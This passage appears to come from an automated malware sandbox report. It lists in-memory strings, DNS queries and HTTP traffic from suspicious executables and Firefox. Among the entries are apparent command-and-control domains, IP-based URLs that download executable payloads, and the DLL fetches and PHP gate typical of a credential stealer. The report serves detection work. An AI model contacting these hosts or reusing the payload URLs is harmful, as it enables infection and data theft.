Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3137866600.0000028826C8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3137866600.0000028826C8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.3137866600.0000028826C8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3180311343.000012316BF00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/firefox-Z equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/messaging_helper.jsYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/True if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.src=image,triggeringprincipal=iconloadingprincipal,requestcontextid,fadein,pinned,selected=visuallyselected,busy,crashed,sharing,pictureinpicture[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]AND (bookmarked OR frecency > 20) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/messaging_helper.jsYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/True if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.src=image,triggeringprincipal=iconloadingprincipal,requestcontextid,fadein,pinned,selected=visuallyselected,busy,crashed,sharing,pictureinpicture[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]AND (bookmarked OR frecency > 20) equals www.twitter.com (Twitter)
Source: firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/messaging_helper.jsYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/True if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.src=image,triggeringprincipal=iconloadingprincipal,requestcontextid,fadein,pinned,selected=visuallyselected,busy,crashed,sharing,pictureinpicture[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]AND (bookmarked OR frecency > 20) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3119588541.00000288245AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E029000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3180311343.000012316BF00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3180311343.000012316BF00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000017.00000002.3173331545.000002882DFCE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3180311343.000012316BF00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3180311343.000012316BF00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.3119588541.00000288245AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3119588541.00000288245B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 06:38:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8BkeUmI4wv2AGvELftXSdrNKPSbHm%2BtVsOhYW3CUjhjFQUnEmL7Q0tWfhlLlCmOQgbluYbzk6aqeN3nhn525pZbelA3UATd2n1LFe%2BZ8z9qWw8y%2B%2BZGFOEmIeP%2BGXd66Pt7Vw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d77f69c2fdf6b8f-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 06:39:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rc%2FbBRrnQEwcednxMK08qa6zRrjCo535lOaNozE4xQcnbVDMGLyCisVJRvyTiaDIl9E9Bkgd0UFNlOHYNBgYLspPUUAU3HbJd1YGSBJ%2Bnbxa8cf3oOYrrRiHcXL0yreemQN5ag%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d77f7d5df39e77d-DFW
Source: firefox.exe, 00000017.00000002.3109502622.0000028823575000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089829933.000002881F2C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3141504979.000002882B07B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3085847545.000002881366D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3042947416.000002882E2FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: skotes.exe, 00000006.00000002.3323108552.0000000000930000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000006.00000002.3323108552.0000000000930000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exehp
Source: skotes.exe, 00000006.00000002.3323108552.0000000000930000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exep
Source: skotes.exe, 00000006.00000002.3323108552.000000000095B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000006.00000002.3323108552.000000000095B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe4#
Source: skotes.exe, 00000006.00000002.3323108552.000000000095B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe
Source: skotes.exe, 00000006.00000002.3323108552.000000000095B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: 7e96f85771.exe, 00000008.00000002.3168952289.000000000140E000.00000004.00000020.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3164480115.00000000009DB000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: http://185.215.113.37
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001453000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001453000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllNe
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll9
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllA
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001468000.00000004.00000020.00020000.00000000.sdmp, 7e96f85771.exe, 00000008.00000002.3164480115.00000000009DB000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?)$P
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpF2
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG(
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_2
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc)xP
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdll
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpinomi
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpla
Source: 7e96f85771.exe, 00000008.00000002.3164480115.00000000009DB000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: 7e96f85771.exe, 00000008.00000002.3164480115.00000000009DB000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: skotes.exe, 00000006.00000002.3323108552.000000000095B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000006.00000002.3323108552.0000000000997000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3323108552.0000000000930000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3323108552.0000000000982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php.
Source: skotes.exe, 00000006.00000002.3323108552.0000000000982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/
Source: skotes.exe, 00000006.00000002.3323108552.000000000094A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4001
Source: skotes.exe, 00000006.00000002.3323108552.0000000000982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
Source: skotes.exe, 00000006.00000002.3323108552.0000000000982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.3323108552.0000000000982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded5
Source: skotes.exe, 00000006.00000002.3323108552.000000000094A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000006.00000002.3323108552.000000000095B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/c00b58987e8fff7a7df309c5441f056fc49001
Source: skotes.exe, 00000006.00000002.3323108552.000000000095B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/c0f9c30b4baed74c61395d7fac00b58987e8fff7a7df309c5441f056fc49#01
Source: skotes.exe, 00000006.00000002.3323108552.000000000095B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ferences.SourceAumid1
Source: skotes.exe, 00000006.00000002.3323108552.000000000095B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/lfons
Source: skotes.exe, 00000006.00000002.3323108552.000000000095B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ons
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000017.00000003.3057540470.00000288244F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000017.00000002.3113740588.0000028823DEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3053217524.000002882601C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3134981536.0000028826091000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089829933.000002881F2C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.3053217524.0000028826091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_CONNECTION_CREATEDLOAD_MEDIA_SNIFFER_
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3127499591.0000028825DC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089829933.000002881F2C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.0000028824319000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089180136.000002881EFEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089829933.000002881F2C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3143683785.000002882B235000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000017.00000002.3127499591.0000028825D1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.comP
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000017.00000002.3088293494.000002881EE26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000017.00000002.3088293494.000002881EE58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000017.00000002.3088293494.000002881EE26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000017.00000002.3088293494.000002881EE58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000017.00000002.3088293494.000002881EE26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000017.00000003.3055688840.000002882E03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E036000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825176000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000017.00000003.3055688840.000002882E03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E036000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825176000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000017.00000003.3055688840.000002882E03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E036000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000017.00000002.3166611995.000002882D0D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3055688840.000002882E03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E036000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825176000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825176000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
